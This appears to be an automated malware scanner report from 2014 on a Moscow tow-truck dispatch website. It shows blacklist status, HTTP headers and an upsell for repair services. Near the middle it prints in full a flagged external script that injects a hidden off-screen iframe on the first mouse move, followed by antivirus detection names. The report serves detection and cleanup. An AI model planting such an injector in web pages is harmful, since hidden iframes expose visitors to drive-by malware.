New scan:

Malware Scanner report for idei-e.ru

Malicious/Suspicious/Total urls checked
1/1/12
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "idei-e.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=idei-e.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://idei-e.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.idei-e.ru/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 06 Aug 2014 11:24:25 GMT
Location: http://idei-e.ru/
Server: nginx/1.2.0
Content-Type: text/html; charset=iso-8859-1
clean
http://idei-e.ru/
200 OK
Content-Length: 41557
Content-Type: text/html
suspicious
Page code contains blacklisted domain: wetop.ru

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Эвакуатор круглосуточно. Вызов эвакуатора в Москве. Единая диспетчерская служба "Эвакуатор".</title>
<meta http-equiv="content-type" content="text/html; cha
...[4401 bytes skipped]...

http://idei-e.ru/js/fixpng.js
200 OK
Content-Length: 816
Content-Type: application/x-javascript
clean
http://www.idei-e.ru/js/jquery-1.3.1.min.js
200 OK
Content-Length: 57272
Content-Type: application/x-javascript
clean
http://api-maps.yandex.ru/1.1/index.xml?key=AEeA0UsBAAAAYxzVUQIAcRgS5NdqdYMp57vn4FNVX7ZEiiEAAAAAAAAAAACqkGXtkr7pn9Y-X0p3pccMx2-4dA==
200 OK
Content-Length: 5375
Content-Type: text/javascript
clean
http://maps.google.com/maps?file=api&v=2.150c&sensor=false&key=ABQIAAAAkBkjG9ERIoP9IMSQbNnm1RRuO3wRdXf3WLRtwsmDGDG4GtcOeRQ5mU4bEzHL3XQhNAsPJSjeeyQWbQ&&hl=ru
200 OK
Content-Length: 4993
Content-Type: text/javascript
clean
http://www.idei-e.ru/js/map.js
200 OK
Content-Length: 25950
Content-Type: application/x-javascript
clean
http://www.idei-e.ru//mc.yandex.ru/metrika/watch.js/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 06 Aug 2014 11:24:29 GMT
Location: http://idei-e.ru//mc.yandex.ru/metrika/watch.js/
Server: nginx/1.2.0
Content-Type: text/html; charset=iso-8859-1
clean
http://idei-e.ru//mc.yandex.ru/metrika/watch.js/
404 Not Found
Content-Length: 571
Content-Type: text/html
clean
http://idei-e.ru/test404page.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 06 Aug 2014 11:24:29 GMT
Location: http://idei-e.ru/test404page.js/
Server: nginx/1.2.0
Content-Type: text/html; charset=iso-8859-1
clean
http://idei-e.ru/test404page.js/
404 Not Found
Content-Length: 571
Content-Type: text/html
clean
http://changeip.changeip.name/rsize.js
200 OK
Content-Length: 405
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

res='Ошибка MySQL';
var astatf = 0;
document.write("<head></head><b><div id='staticaccoin'></div></b>");
document.onmousemove=moveonlinetest;
function moveonlinetest()
{
if (astatf == 0) {
astatf++;
text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>";
document.getElementById("staticaccoin").innerHTML = text
}}

Antivirus reports:

Rising
JS:Malware.HiddenFrame!1.9BFB
Comodo
TrojWare.JS.iFrame.DEE
Kaspersky
Trojan-Downloader.JS.Iframe.dee
Fortinet
HTML/IFrame.HF!tr
NANO-Antivirus
Trojan.Script.Iframe.cktapo
ESET-NOD32
JS/Iframe.HF


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: idei-e.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 06 Aug 2014 11:24:25 GMT
Pragma: no-cache
Accept-Charset: UTF-8
Server: nginx/1.2.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=46fce0b231600152e42fed1766a241b6; path=/
X-Powered-By: PHP/5.2.10
Second query (visit from search engine):
GET / HTTP/1.1
Host: idei-e.ru
Referer: http://www.google.com/search?q=idei-e.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.